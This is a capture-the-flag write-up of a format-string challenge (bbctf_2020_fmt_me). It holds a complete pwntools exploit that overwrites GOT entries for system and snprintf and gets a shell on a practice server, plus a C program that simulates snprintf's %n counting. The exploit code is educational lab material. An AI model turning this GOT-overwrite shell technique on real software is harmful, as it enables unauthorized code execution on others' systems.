BUUCTF-PWN-bbctf_2020_fmt_me

checksec

[screenshot: checksec output]

IDA

[screenshot: IDA decompilation]

Offset calculation

Debug with gdb: first set a breakpoint on system, then give the program the input shown below:

[screenshot: gdb session with the test input]

Because snprintf does not print the formatted buf to standard output but writes it into other_buf, the result has to be read back from memory in gdb:

Use the command x/5s 0x4040a0, where 0x4040a0 is the address of other_buf.

[screenshot: gdb memory dump of other_buf]

This gives an offset of 6: the format string begins at the 6th argument of snprintf.

EXP

```python
from pwn import *

context.arch = 'amd64'
# context.log_level = 'debug'

p = remote('node4.buuoj.cn', 28695)
elf = ELF('./fm')

def gift(payload):
    """Pick menu option 2 and feed one format string to the vulnerable snprintf."""
    p.sendlineafter(b'Choice: ', b'2')
    p.sendlineafter(b"Good job. I'll give you a gift.", payload)

# 1) system@got -> main: the system() call that follows snprintf now restarts
#    main instead of finishing the program, so we get further rounds of input.
#    The format string starts at stack argument 6 (measured above with gdb).
fmt1 = fmtstr_payload(6, {elf.got['system']: elf.sym['main']}, write_size='long')
gift(fmt1)

# 2) snprintf@got -> 0x401056. The 8-byte "/bin/sh;" prefix occupies one stack
#    slot, so the payload now starts at argument 7, and since those 8 bytes are
#    counted by %n as well, the value handed to fmtstr_payload is lowered by 8.
#    After this round other_buf begins with "/bin/sh;".
#    0x401056 was read from the binary; in the usual PLT layout it is
#    system@plt+6, the lazy-binding stub that makes ld.so resolve the real
#    system even though system@got now holds main. Check it against your copy.
fmt2 = b'/bin/sh;'
fmt2 += fmtstr_payload(7, {elf.got['snprintf']: 0x401056 - 8}, write_size='long')
gift(fmt2)

# 3) The next snprintf(other_buf, ...) is really system(other_buf, ...), and
#    other_buf still starts with "/bin/sh;". The input itself is irrelevant.
gift(b'aaaaaaaa')

p.interactive()
```
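Two properties of snprintf make the script above work: the %n counter keeps running even after the 0x100-byte output limit is reached, and any bytes emitted before the payload (the "/bin/sh;" prefix) shift that counter, which is why the target value is lowered by 8. The C program below is an added example written for this writeup, not code from the challenge binary or from the original post; it uses string-literal formats and passes the write target as an explicit pointer argument instead of relying on the stack offset, and the 0x100 size of other_buf is assumed from the writeup.

```c
#include <stdio.h>
#include <string.h>

/* Assumed from the writeup: snprintf(other_buf, 0x100, buf). */
#define OTHER_BUF_SIZE 0x100

/* Emulates one "gift" round for buf = ["/bin/sh;"] "%<width>c%ln".
 * `width` plays the role of the padding fmtstr_payload computes and
 * `prefix` selects whether "/bin/sh;" is emitted first, as in fmt2.
 * The %ln target is passed explicitly (the real exploit finds it on the
 * stack at argument 6 or 7). Returns the value stored through %ln and,
 * if `cmd` is given, copies the resulting other_buf into it. */
long simulate_gift(int width, int prefix, char *cmd, size_t cmdlen)
{
    char other_buf[OTHER_BUF_SIZE];
    long got_slot = 0;

    /* snprintf stops *storing* after OTHER_BUF_SIZE - 1 bytes but keeps
     * *counting*, so %ln receives the full width (plus the prefix length). */
    if (prefix)
        snprintf(other_buf, sizeof other_buf, "/bin/sh;%*c%ln", width, 'A', &got_slot);
    else
        snprintf(other_buf, sizeof other_buf, "%*c%ln", width, 'A', &got_slot);

    if (cmd != NULL && cmdlen > 0) {
        strncpy(cmd, other_buf, cmdlen - 1);
        cmd[cmdlen - 1] = '\0';
    }
    return got_slot;
}

/* After the prefixed round, other_buf is what system(other_buf, ...) will
 * run: it must start with "/bin/sh;" and is truncated to 0xff characters. */
int command_starts_with_shell(int width)
{
    char cmd[OTHER_BUF_SIZE];
    simulate_gift(width, 1, cmd, sizeof cmd);
    return strncmp(cmd, "/bin/sh;", 8) == 0 && strlen(cmd) == OTHER_BUF_SIZE - 1;
}

int main(void)
{
    /* 0x401056 == 4198486, the value the exploit writes into snprintf@got. */
    printf("no prefix, width 0x401056:      0x%lx\n", simulate_gift(0x401056, 0, NULL, 0));
    printf("prefix, width 0x401056 (naive): 0x%lx\n", simulate_gift(0x401056, 1, NULL, 0));
    printf("prefix, width 0x401056-8:       0x%lx\n", simulate_gift(0x401056 - 8, 1, NULL, 0));
    printf("other_buf usable as command:    %d\n", command_starts_with_shell(0x401056 - 8));
    return 0;
}
```

The naive prefixed variant lands 8 too high, which is exactly the error the `0x401056-8` in the script corrects; the same compensation is needed for any bytes placed in front of a fmtstr_payload.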

Result

[screenshot: result of running the exploit]